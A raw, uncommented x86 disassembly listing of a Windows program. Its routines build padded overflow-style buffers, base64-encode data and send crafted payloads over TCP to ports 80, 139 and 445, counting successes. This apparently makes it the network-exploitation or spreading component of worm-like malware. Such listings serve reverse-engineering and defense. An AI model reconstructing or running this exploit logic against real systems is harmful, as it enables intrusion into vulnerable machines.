loc_404479: ; CODE XREF: sub_40444F+D�j
xor al, al
jmp short loc_4044CF
; ---------------------------------------------------------------------------
loc_40447D: ; CODE XREF: sub_40444F+28�j
mov eax, [esi+4]
add eax, ebx
push eax
push 0
push edi
call sub_4179E0
add esp, 0Ch
cmp ebx, 1
jnz short loc_40449D
mov al, [esi+4]
mov [edi], al
lea eax, [edi+1]
jmp short loc_4044B2
; ---------------------------------------------------------------------------
loc_40449D: ; CODE XREF: sub_40444F+42�j
mov byte ptr [edi], 82h
mov eax, [esi+4]
sar eax, 8
mov [edi+1], al
mov al, [esi+4]
mov [edi+2], al
lea eax, [edi+3]
loc_4044B2: ; CODE XREF: sub_40444F+4C�j
push dword ptr [esi+4]
push dword ptr [esi]
push eax
call sub_417A40
add esp, 0Ch
push dword ptr [esi] ; lpMem
call sub_418227
add [esi+4], ebx
pop ecx
mov [esi], edi
mov al, 1
loc_4044CF: ; CODE XREF: sub_40444F+2C�j
pop edi
pop esi
pop ebx
retn
sub_40444F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4044D3 proc near ; CODE XREF: sub_404609+89�p
; sub_404609+E3�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push edi
lea ecx, [ebp+var_8]
push dword ptr [esi+4]
push dword ptr [esi]
push 1
push 440FACh
call sub_4043E1
lea ecx, [ebp+var_8]
call sub_40444F
mov eax, [ebp+var_4]
inc eax
push eax
call sub_418175
mov edi, eax
pop ecx
test edi, edi
jnz short loc_40450D
xor al, al
jmp short loc_404549
; ---------------------------------------------------------------------------
loc_40450D: ; CODE XREF: sub_4044D3+34�j
mov eax, [ebp+var_4]
inc eax
push eax
push 0
push edi
call sub_4179E0
mov byte ptr [edi], 3
push [ebp+var_4]
lea eax, [edi+1]
push [ebp+var_8]
push eax
call sub_417A40
add esp, 18h
mov ecx, esi
call sub_404436
mov eax, [ebp+var_4]
lea ecx, [ebp+var_8]
inc eax
mov [esi], edi
mov [esi+4], eax
call sub_404436
mov al, 1
loc_404549: ; CODE XREF: sub_4044D3+38�j
pop edi
pop esi
leave
retn
sub_4044D3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40454D proc near ; CODE XREF: sub_404581+14�p
; sub_40459E+8�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push [ebp+arg_4]
lea ecx, [ebp+var_8]
push [ebp+arg_0]
push dword ptr [esi+4]
push dword ptr [esi]
call sub_4043E1
mov ecx, esi
call sub_404436
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
pop esi
leave
retn 8
sub_40454D endp
; =============== S U B R O U T I N E =======================================
sub_404581 proc near ; CODE XREF: sub_404609+F0�p
; sub_404609+15B�p ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
call sub_4180D0
pop ecx
push eax
mov ecx, esi
push [esp+8+arg_0]
call sub_40454D
pop esi
retn 4
sub_404581 endp
; =============== S U B R O U T I N E =======================================
sub_40459E proc near ; CODE XREF: sub_4045EA+B�p
; sub_404609+1A1�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_40454D
retn 8
sub_40459E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4045AE proc near ; CODE XREF: sub_4045EA+16�p
; sub_404609+91�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
call sub_40444F
test al, al
jz short loc_4045E7
push dword ptr [esi+4]
lea ecx, [ebp+var_8]
push dword ptr [esi]
push 1
push 429510h
call sub_4043E1
mov ecx, esi
call sub_404436
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
loc_4045E7: ; CODE XREF: sub_4045AE+F�j
pop esi
leave
retn
sub_4045AE endp
; =============== S U B R O U T I N E =======================================
sub_4045EA proc near ; CODE XREF: sub_404609+134�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_40459E
test al, al
jz short loc_404605
mov ecx, esi
call sub_4045AE
loc_404605: ; CODE XREF: sub_4045EA+12�j
pop esi
retn 8
sub_4045EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404609 proc near ; CODE XREF: .text:00404E80�p
var_858 = byte ptr -858h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 858h
push ebx
push edi
lea ecx, [ebp+var_48]
call sub_40439D
mov edi, 408h
cmp [ebp+arg_8], edi
jg loc_40494D
mov ebx, [ebp+arg_10]
lea eax, [ebx+8]
cmp eax, edi
ja loc_40494D
push esi
lea ecx, [ebp+var_30]
call sub_40439D
lea ecx, [ebp+var_20]
call sub_40439D
lea ecx, [ebp+var_50]
call sub_40439D
lea ecx, [ebp+var_18]
call sub_40439D
lea ecx, [ebp+var_40]
call sub_40439D
lea ecx, [ebp+var_38]
call sub_40439D
lea ecx, [ebp+var_28]
call sub_40439D
push 4
push 4291A4h
lea ecx, [ebp+var_30]
call sub_40454D
push 3
push 4291ACh
lea ecx, [ebp+var_30]
call sub_40454D
lea ecx, [ebp+var_30]
call sub_4044D3
lea ecx, [ebp+var_30]
call sub_4045AE
mov esi, 800h
lea eax, [ebp+var_858]
push esi
push 42h
push eax
call sub_4179E0
add esp, 0Ch
lea ecx, [ebp+var_20]
push 8
push 429198h
call sub_40454D
push ebx
lea ecx, [ebp+var_20]
push [ebp+arg_C]
call sub_40454D
mov eax, 409h
lea ecx, [ebp+var_20]
sub eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_858]
push eax
call sub_40454D
lea ecx, [ebp+var_20]
call sub_4044D3
push 429538h
lea ecx, [ebp+var_50]
call sub_404581
lea ecx, [ebp+var_50]
call sub_4044D3
push esi
lea eax, [ebp+var_858]
push 44h
push eax
call sub_4179E0
add esp, 0Ch
lea eax, [ebp+var_858]
lea ecx, [ebp+var_58]
push 410h
push eax
call sub_4043A7
lea ecx, [ebp+var_58]
call sub_4044D3
push [ebp+var_54]
lea ecx, [ebp+var_50]
push [ebp+var_58]
call sub_4045EA
lea ecx, [ebp+var_58]
call sub_404436
push esi
lea eax, [ebp+var_858]
push 43h
push eax
call sub_4179E0
add esp, 0Ch
push 429530h
lea ecx, [ebp+var_18]
call sub_404581
push 4
push 4291B0h
lea ecx, [ebp+var_18]
call sub_40454D
push [ebp+arg_8]
lea ecx, [ebp+var_18]
push [ebp+arg_4]
call sub_40454D
sub edi, [ebp+arg_8]
lea eax, [ebp+var_858]
lea ecx, [ebp+var_18]
push edi
push eax
call sub_40454D
lea ecx, [ebp+var_18]
call sub_4044D3
push [ebp+var_14]
lea ecx, [ebp+var_40]
push [ebp+var_18]
call sub_40459E
push [ebp+var_4C]
lea ecx, [ebp+var_40]
push [ebp+var_50]
call sub_40459E
lea ecx, [ebp+var_40]
call sub_4045AE
lea ecx, [ebp+var_18]
call sub_404436
lea ecx, [ebp+var_50]
call sub_404436
push [ebp+var_1C]
lea ecx, [ebp+var_38]
push [ebp+var_20]
call sub_40459E
push [ebp+var_2C]
lea ecx, [ebp+var_38]
push [ebp+var_30]
call sub_40459E
push [ebp+var_3C]
lea ecx, [ebp+var_38]
push [ebp+var_40]
call sub_40459E
lea ecx, [ebp+var_38]
call sub_4045AE
lea ecx, [ebp+var_20]
call sub_404436
lea ecx, [ebp+var_30]
call sub_404436
lea ecx, [ebp+var_40]
call sub_404436
push esi
lea eax, [ebp+var_858]
push 41h
push eax
call sub_4179E0
add esp, 0Ch
lea eax, [ebp+var_858]
lea ecx, [ebp+var_28]
push 400h
push eax
call sub_40454D
lea ecx, [ebp+var_28]
call sub_4044D3
push 2
push 42952Ch
lea ecx, [ebp+var_28]
call sub_40454D
push [ebp+var_34]
lea ecx, [ebp+var_28]
push [ebp+var_38]
call sub_40459E
lea ecx, [ebp+var_28]
call sub_4045AE
lea ecx, [ebp+var_38]
call sub_404436
lea ecx, [ebp+var_10]
call sub_40439D
lea ecx, [ebp+var_8]
call sub_40439D
push [ebp+var_24]
lea ecx, [ebp+var_10]
push [ebp+var_28]
call sub_40459E
lea ecx, [ebp+var_10]
call sub_40444F
lea ecx, [ebp+var_28]
call sub_404436
push 429528h
lea ecx, [ebp+var_8]
call sub_404581
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_40459E
lea ecx, [ebp+var_8]
call sub_40444F
lea ecx, [ebp+var_10]
call sub_404436
push 429524h
lea ecx, [ebp+var_10]
call sub_404581
push [ebp+var_4]
lea ecx, [ebp+var_10]
push [ebp+var_8]
call sub_40459E
lea ecx, [ebp+var_10]
call sub_40444F
lea ecx, [ebp+var_8]
call sub_404436
push 429518h
lea ecx, [ebp+var_8]
call sub_404581
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_40459E
lea ecx, [ebp+var_8]
call sub_40444F
lea ecx, [ebp+var_10]
call sub_404436
push 429514h
lea ecx, [ebp+var_48]
call sub_404581
push [ebp+var_4]
lea ecx, [ebp+var_48]
push [ebp+var_8]
call sub_40459E
lea ecx, [ebp+var_8]
call sub_404436
pop esi
loc_40494D: ; CODE XREF: sub_404609+1B�j
; sub_404609+29�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_48]
pop edi
pop ebx
mov [eax], ecx
mov ecx, [ebp+var_44]
mov [eax+4], ecx
leave
retn
sub_404609 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40495F(SOCKET s, char *buf, int len, int flags)
sub_40495F proc near ; CODE XREF: sub_404A23+A2�p
; sub_404A23+C7�p ...
exceptfds = fd_set ptr -210h
readfds = fd_set ptr -10Ch
timeout = timeval ptr -8
s = dword ptr 8
buf = dword ptr 0Ch
len = dword ptr 10h
flags = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push esi
mov esi, [ebp+s]
lea eax, [ebp+timeout]
push edi
push eax ; timeout
lea eax, [ebp+exceptfds]
and [ebp+timeout.tv_usec], 0
push eax ; exceptfds
lea eax, [ebp+readfds]
push 0 ; writefds
xor edi, edi
push eax ; readfds
lea eax, [esi+1]
inc edi
push eax ; nfds
mov [ebp+readfds.fd_array], esi
mov [ebp+readfds.fd_count], edi
mov [ebp+exceptfds.fd_array], esi
mov [ebp+exceptfds.fd_count], edi
mov [ebp+timeout.tv_sec], 0Ah
call select ; select
cmp eax, edi
jnz short loc_4049C6
lea eax, [ebp+readfds]
push eax ; fd_set *
push esi ; fd
call __WSAFDIsSet ; __WSAFDIsSet
test eax, eax
jnz short loc_4049CA
loc_4049C6: ; CODE XREF: sub_40495F+54�j
xor eax, eax
jmp short loc_4049DA
; ---------------------------------------------------------------------------
loc_4049CA: ; CODE XREF: sub_40495F+65�j
push [ebp+flags] ; flags
push [ebp+len] ; len
push [ebp+buf] ; buf
push esi ; s
call recv_0
loc_4049DA: ; CODE XREF: sub_40495F+69�j
pop edi
pop esi
leave
retn
sub_40495F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4049DE(SOCKET s, int, u_long len)
sub_4049DE proc near ; CODE XREF: sub_404A23+80�p
; sub_404A23+AE�p
buf = byte ptr -4
s = dword ptr 8
arg_4 = dword ptr 0Ch
len = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+len] ; hostlong
call htonl_0
mov dword ptr [ebp+buf], eax
push 0 ; flags
lea eax, [ebp+buf]
push 4 ; len
push eax ; buf
push [ebp+s] ; s
call send_0
cmp eax, 4
jz short loc_404A08
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_404A08: ; CODE XREF: sub_4049DE+24�j
push 0 ; flags
push [ebp+len] ; len
push [ebp+arg_4] ; buf
push [ebp+s] ; s
call send_0
sub eax, [ebp+len]
neg eax
sbb eax, eax
inc eax
leave
retn
sub_4049DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_404A23(SOCKET s, int, int)
sub_404A23 proc near ; CODE XREF: sub_404B02+48�p
; .text:00404F71�p
buf = byte ptr -104h
len = dword ptr -4
s = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 104h
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
lea ebx, [edi+41h]
push ebx
mov [ebp+len], ebx
call sub_418175
mov esi, eax
pop ecx
test esi, esi
jnz short loc_404A4C
xor al, al
jmp loc_404AFD
; ---------------------------------------------------------------------------
loc_404A4C: ; CODE XREF: sub_404A23+20�j
push ebx
push 0
push esi
call sub_4179E0
push 2Fh
push 429240h
push esi
call sub_417A40
push 8
lea eax, [esi+31h]
push 429270h
push eax
mov [esi+2Fh], di
call sub_417A40
push edi
lea ebx, [esi+3Bh]
push [ebp+arg_4]
mov [esi+39h], di
push ebx
call sub_417A40
push 6
add ebx, edi
push 440FA4h
push ebx
call sub_417A40
push 85h ; len
push 4291B8h ; int
push [ebp+s] ; s
call sub_4049DE
add esp, 48h
test al, al
jnz short loc_404AB3
loc_404AAF: ; CODE XREF: sub_404A23+B8�j
xor bl, bl
jmp short loc_404AF4
; ---------------------------------------------------------------------------
loc_404AB3: ; CODE XREF: sub_404A23+8A�j
mov edi, 100h
push 0 ; flags
lea eax, [ebp+buf]
push edi ; len
push eax ; buf
push [ebp+s] ; s
call sub_40495F
push [ebp+len] ; len
push esi ; int
push [ebp+s] ; s
call sub_4049DE
add esp, 1Ch
test al, al
jz short loc_404AAF
push 0 ; flags
lea eax, [ebp+buf]
push edi ; len
push eax ; buf
push [ebp+s] ; s
call sub_40495F
add esp, 10h
mov bl, 1
loc_404AF4: ; CODE XREF: sub_404A23+8E�j
push esi ; lpMem
call sub_418227
pop ecx
mov al, bl
loc_404AFD: ; CODE XREF: sub_404A23+24�j
pop edi
pop esi
pop ebx
leave
retn
sub_404A23 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_404B02(SOCKET s, int, int)
sub_404B02 proc near ; CODE XREF: .text:00404F57�p
buf = byte ptr -20h
s = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push 0 ; flags
push 48h ; len
push offset unk_429280 ; buf
push [ebp+s] ; s
call send ; send
cmp eax, 48h
jnz short loc_404B3D
push 0 ; flags
lea eax, [ebp+buf]
push 20h ; len
push eax ; buf
push [ebp+s] ; s
call sub_40495F
add esp, 10h
cmp eax, 0FFFFFFFFh
jz short loc_404B3D
cmp [ebp+buf], 82h
jz short loc_404B41
loc_404B3D: ; CODE XREF: sub_404B02+1B�j
; sub_404B02+33�j
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_404B41: ; CODE XREF: sub_404B02+39�j
push [ebp+arg_8] ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_404A23
add esp, 0Ch
leave
retn
sub_404B02 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404B54 proc near ; CODE XREF: sub_404BA0+2D�p
var_10 = qword ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
and dword ptr [ebp+var_8+4], 0
shl eax, 3
mov dword ptr [ebp+var_8], eax
fild [ebp+var_8]
fmul qword ptr unk_424270
call sub_4183B0
and dword ptr [ebp+var_8+4], 0
mov dword ptr [ebp+var_8], eax
fild [ebp+var_8]
push ecx
push ecx ; double
fst [ebp+var_8]
fmul qword ptr unk_424268
fstp [esp+10h+var_10]
call sub_418290
fadd st, st
pop ecx
pop ecx
fadd [ebp+var_8]
call sub_4183B0
inc eax
leave
retn
sub_404B54 endp
; =============== S U B R O U T I N E =======================================
sub_404BA0 proc near ; CODE XREF: sub_404D3F+24�p
var_40 = qword ptr -40h
mov eax, offset loc_423837
call sub_41887C
sub esp, 2Ch
push ebx
push esi
push edi
xor edi, edi
mov [ebp-20h], edi
mov al, [ebp+13h]
push edi
lea ecx, [ebp-38h]
mov [ebp-38h], al
call sub_4051D0
push dword ptr [ebp+10h]
xor ebx, ebx
inc ebx
mov [ebp-4], ebx
call sub_404B54
cmp [ebp-2Ch], eax
pop ecx
jnb short loc_404BE2
push edi
push eax
lea ecx, [ebp-38h]
call sub_40514A
loc_404BE2: ; CODE XREF: sub_404BA0+36�j
cmp [ebp+10h], edi
mov [ebp-18h], edi
jbe loc_404D00
mov ebx, [ebp+10h]
loc_404BF1: ; CODE XREF: sub_404BA0+157�j
cmp dword ptr [ebp+10h], 3
jb short loc_404BFC
push 3
loc_404BF9: ; CODE XREF: sub_404BA0+64�j
pop ebx
jmp short loc_404C0F
; ---------------------------------------------------------------------------
loc_404BFC: ; CODE XREF: sub_404BA0+55�j
cmp dword ptr [ebp+10h], 2
jnz short loc_404C06
push 2
jmp short loc_404BF9
; ---------------------------------------------------------------------------
loc_404C06: ; CODE XREF: sub_404BA0+60�j
cmp dword ptr [ebp+10h], 1
jnz short loc_404C0F
xor ebx, ebx
inc ebx
loc_404C0F: ; CODE XREF: sub_404BA0+5A�j
; sub_404BA0+6A�j
mov [ebp-28h], ebx
mov [ebp-24h], edi
fild qword ptr [ebp-28h]
push ecx
push ecx ; double
fmul qword ptr unk_424278
fstp [esp+40h+var_40]
call sub_4183D7
pop ecx
pop ecx
call sub_4183B0
cmp ebx, edi
mov [ebp-1Ch], eax
jbe short loc_404C4E
mov esi, [ebp+0Ch]
mov ecx, ebx
mov edx, ecx
lea edi, [ebp-10h]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
xor edi, edi
loc_404C4E: ; CODE XREF: sub_404BA0+94�j
mov cl, [ebp-10h]
mov dl, [ebp-10h]
sar cl, 2
and cl, 3Fh
and dl, 3
mov [ebp-14h], cl
mov cl, [ebp-0Fh]
sar cl, 4
and cl, 0Fh
add [ebp+0Ch], ebx
shl dl, 4
add cl, dl
mov dl, [ebp-0Fh]
mov [ebp-13h], cl
mov cl, [ebp-0Eh]
sar cl, 6
and dl, 0Fh
sub [ebp+10h], ebx
and cl, 3
xor esi, esi
shl dl, 2
add cl, dl
mov [ebp-12h], cl
mov cl, [ebp-0Eh]
and cl, 3Fh
cmp eax, edi
mov [ebp-11h], cl
jbe short loc_404CBC
add [ebp-18h], eax
loc_404CA0: ; CODE XREF: sub_404BA0+11A�j
movsx eax, byte ptr [ebp+esi-14h]
lea ecx, [ebp-38h]
mov al, [eax+4292D0h]
push eax
push 1
call sub_404FCB
inc esi
cmp esi, [ebp-1Ch]
jb short loc_404CA0
loc_404CBC: ; CODE XREF: sub_404BA0+FB�j
cmp dword ptr [ebp-18h], 48h
jb short loc_404CDA
push dword ptr [ebp+14h]
call sub_4180D0
pop ecx
push eax
lea ecx, [ebp-38h]
push dword ptr [ebp+14h]
call sub_405025
mov [ebp-18h], edi
loc_404CDA: ; CODE XREF: sub_404BA0+120�j
push 4
pop esi
cmp [ebp-1Ch], esi
jnb short loc_404CF4
sub esi, [ebp-1Ch]
loc_404CE5: ; CODE XREF: sub_404BA0+152�j
push 3Dh
push 1
lea ecx, [ebp-38h]
call sub_404FCB
dec esi
jnz short loc_404CE5
loc_404CF4: ; CODE XREF: sub_404BA0+140�j
cmp [ebp+10h], edi
ja loc_404BF1
xor ebx, ebx
inc ebx
loc_404D00: ; CODE XREF: sub_404BA0+48�j
mov esi, [ebp+8]
mov al, [ebp-38h]
push edi
mov ecx, esi
mov [esi], al
call sub_4051D0
push 0FFFFFFFFh
lea eax, [ebp-38h]
push edi
push eax
mov ecx, esi
call sub_40507D
mov [ebp-20h], ebx
and byte ptr [ebp-4], 0
push ebx
lea ecx, [ebp-38h]
call sub_4051D0
mov ecx, [ebp-0Ch]
mov eax, esi
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn
sub_404BA0 endp
; =============== S U B R O U T I N E =======================================
sub_404D3F proc near ; CODE XREF: .text:00404F3A�p
mov eax, offset loc_423854
call sub_41887C
sub esp, 10h
push ebx
push esi
push edi
push 440F9Ch
lea eax, [ebp-1Ch]
push dword ptr [ebp+10h]
xor ebx, ebx
mov [ebp-4], ebx
push dword ptr [ebp+0Ch]
push eax
call sub_404BA0
mov eax, [ebp+1Ch]
mov ecx, [ebp-14h]
mov byte ptr [ebp-4], 1
lea esi, [ecx+eax+36h]
push esi
call sub_418175
mov edi, eax
add esp, 14h
cmp edi, ebx
jnz short loc_404D89
xor bl, bl
jmp short loc_404DCD
; ---------------------------------------------------------------------------
loc_404D89: ; CODE XREF: sub_404D3F+44�j
mov ecx, [ebp-18h]
mov eax, 424280h
cmp ecx, ebx
jnz short loc_404D97
mov ecx, eax
loc_404D97: ; CODE XREF: sub_404D3F+54�j
cmp [ebp+18h], ebx
jz short loc_404D9F
mov eax, [ebp+18h]
loc_404D9F: ; CODE XREF: sub_404D3F+5B�j
push ecx
push eax
push 424228h
push esi
push edi
call sub_417EDA
add esp, 14h
push ebx ; flags
push esi ; len
push edi ; buf
push dword ptr [ebp+8] ; s
call send_0
cmp eax, esi
jz short loc_404DC4
xor bl, bl
jmp short loc_404DC6
; ---------------------------------------------------------------------------
loc_404DC4: ; CODE XREF: sub_404D3F+7F�j
mov bl, 1
loc_404DC6: ; CODE XREF: sub_404D3F+83�j
push edi ; lpMem
call sub_418227
pop ecx
loc_404DCD: ; CODE XREF: sub_404D3F+48�j
and byte ptr [ebp-4], 0
push 1
lea ecx, [ebp-1Ch]
call sub_4051D0
or dword ptr [ebp-4], 0FFFFFFFFh
push 1
lea ecx, [ebp+14h]
call sub_4051D0
mov ecx, [ebp-0Ch]
pop edi
mov al, bl
pop esi
pop ebx
mov large fs:0, ecx
leave
retn
sub_404D3F endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 420h
and byte ptr [ebp-420h], 0
push ebx
push esi
push edi
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp-41Fh]
push 8Fh
rep stosd
stosw
stosb
lea eax, [ebp-420h]
push 429480h
push eax
call sub_417A40
add esp, 0Ch
mov eax, 431644h
push eax
push eax
push dword_4410C0
push dword ptr [ebp+8]
call sub_40B972
pop ecx
push eax
push 429548h
lea eax, [ebp-391h]
push 400h
push eax
call sub_417EDA
add eax, 90h
push eax
lea eax, [ebp-420h]
push eax
push 164h
lea eax, [ebp-8]
push 429318h
push eax
call sub_404609
xor esi, esi
add esp, 30h
cmp [ebp-4], esi
jnz short loc_404E96
xor eax, eax
jmp loc_404FBE
; ---------------------------------------------------------------------------
loc_404E96: ; CODE XREF: .text:00404E8D�j
mov [ebp-0Ch], esi
loc_404E99: ; CODE XREF: .text:00404F99�j
test esi, esi
jnz loc_404F9F
push 6
push 1
push 2
call socket ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_404F87
xor eax, eax
lea edi, [ebp-1Ah]
stosd
push dword ptr [ebp+0A8h]
stosd
stosd
stosw
mov word ptr [ebp-1Ch], 2
call htons_2
mov [ebp-1Ah], ax
lea eax, [ebp+0Ch]
push eax
call inet_addr_0
mov [ebp-18h], eax
lea eax, [ebp-1Ch]
push 10h
push eax
push ebx
call connect_0
cmp eax, 0FFFFFFFFh
jz loc_404F7C
cmp dword ptr [ebp+0A8h], 50h
jnz short loc_404F44
mov al, [ebp+0C3h]
sub esp, 10h
mov esi, esp
mov [ebp-20h], esp
push 0
mov ecx, esi
mov [esi], al
call sub_4051D0
lea eax, [ebp+0Ch]
push eax
call sub_4180D0
pop ecx
push eax
lea eax, [ebp+0Ch]
push eax
mov ecx, esi
call sub_405208
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push ebx
call sub_404D3F
add esp, 1Ch
jmp short loc_404F79
; ---------------------------------------------------------------------------
loc_404F44: ; CODE XREF: .text:00404F02�j
cmp dword ptr [ebp+0A8h], 8Bh
jnz short loc_404F5E
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push ebx
call sub_404B02
jmp short loc_404F76
; ---------------------------------------------------------------------------
loc_404F5E: ; CODE XREF: .text:00404F4E�j
cmp dword ptr [ebp+0A8h], 1BDh
jnz short loc_404F7C
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push ebx
call sub_404A23
loc_404F76: ; CODE XREF: .text:00404F5C�j
add esp, 0Ch
loc_404F79: ; CODE XREF: .text:00404F42�j
movzx esi, al
loc_404F7C: ; CODE XREF: .text:00404EF5�j
; .text:00404F68�j
push ebx
call closesocket_0
test esi, esi
jnz short loc_404F92
loc_404F87: ; CODE XREF: .text:00404EB2�j
push 3E8h
call Sleep ; Sleep
loc_404F92: ; CODE XREF: .text:00404F85�j
inc dword ptr [ebp-0Ch]
cmp dword ptr [ebp-0Ch], 2
jl loc_404E99
loc_404F9F: ; CODE XREF: .text:00404E9B�j
lea ecx, [ebp-8]
call sub_404436
test esi, esi
jz short loc_404FBC
mov eax, [ebp+0B0h]
shl eax, 6
lea eax, [eax+42B628h]
inc dword ptr [eax]
loc_404FBC: ; CODE XREF: .text:00404FA9�j
mov eax, esi
loc_404FBE: ; CODE XREF: .text:00404E91�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_404FC3: ; CODE XREF: .text:0042381B�j
; .text:00423831�j ...
push 1
call sub_4051D0
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404FCB proc near ; CODE XREF: sub_404BA0+111�p
; sub_404BA0+14C�p
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, ecx
or eax, 0FFFFFFFFh
push edi
sub eax, [esi+8]
cmp eax, [ebp+arg_0]
ja short loc_404FE2
call sub_422DA0
loc_404FE2: ; CODE XREF: sub_404FCB+10�j
cmp [ebp+arg_0], 0
jbe short loc_40501D
mov edi, [esi+8]
push 0
add edi, [ebp+arg_0]
mov ecx, esi
push edi
call sub_40514A
test al, al
jz short loc_40501D
movsx eax, [ebp+arg_4]
push [ebp+arg_0]
push eax
mov eax, [esi+4]
add eax, [esi+8]
push eax
call sub_4179E0
mov eax, [esi+4]
add esp, 0Ch
mov [esi+8], edi
and byte ptr [edi+eax], 0
loc_40501D: ; CODE XREF: sub_404FCB+1B�j
; sub_404FCB+2F�j
mov eax, esi
pop edi
pop esi
pop ebp
retn 8
sub_404FCB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405025 proc near ; CODE XREF: sub_404BA0+132�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, ecx
or eax, 0FFFFFFFFh
push edi
sub eax, [esi+8]
cmp eax, [ebp+arg_4]
ja short loc_40503C
call sub_422DA0
loc_40503C: ; CODE XREF: sub_405025+10�j
cmp [ebp+arg_4], 0
jbe short loc_405075
mov edi, [esi+8]
push 0
add edi, [ebp+arg_4]
mov ecx, esi
push edi
call sub_40514A
test al, al
jz short loc_405075
push [ebp+arg_4]
mov eax, [esi+8]
add eax, [esi+4]
push [ebp+arg_0]
push eax
call sub_417A40
mov eax, [esi+4]
add esp, 0Ch
mov [esi+8], edi
and byte ptr [edi+eax], 0
loc_405075: ; CODE XREF: sub_405025+1B�j
; sub_405025+2F�j
mov eax, esi
pop edi
pop esi
pop ebp
retn 8
sub_405025 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40507D proc near ; CODE XREF: sub_404BA0+179�p
; sub_422DFA+46�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
mov edi, ecx
cmp [ebx+8], eax
jnb short loc_405095
call sub_422FCC
loc_405095: ; CODE XREF: sub_40507D+11�j
mov eax, [ebx+8]
mov ecx, [ebp+arg_4]
mov esi, eax
sub esi, ecx
cmp [ebp+arg_8], esi
jnb short loc_4050A7
mov esi, [ebp+arg_8]
loc_4050A7: ; CODE XREF: sub_40507D+25�j
cmp edi, ebx
jnz short loc_4050C5
add esi, ecx
push 0FFFFFFFFh
push esi
mov ecx, edi
call sub_40523D
push [ebp+arg_4]
mov ecx, edi
push 0
call sub_40523D
jmp short loc_405141
; ---------------------------------------------------------------------------
loc_4050C5: ; CODE XREF: sub_40507D+2C�j
test esi, esi
jbe short loc_405108
cmp esi, eax
jnz short loc_405108
mov eax, [ebx+4]
test eax, eax
jnz short loc_4050D9
mov eax, 424280h
loc_4050D9: ; CODE XREF: sub_40507D+55�j
cmp byte ptr [eax-1], 0FEh
jnb short loc_405108
push 1
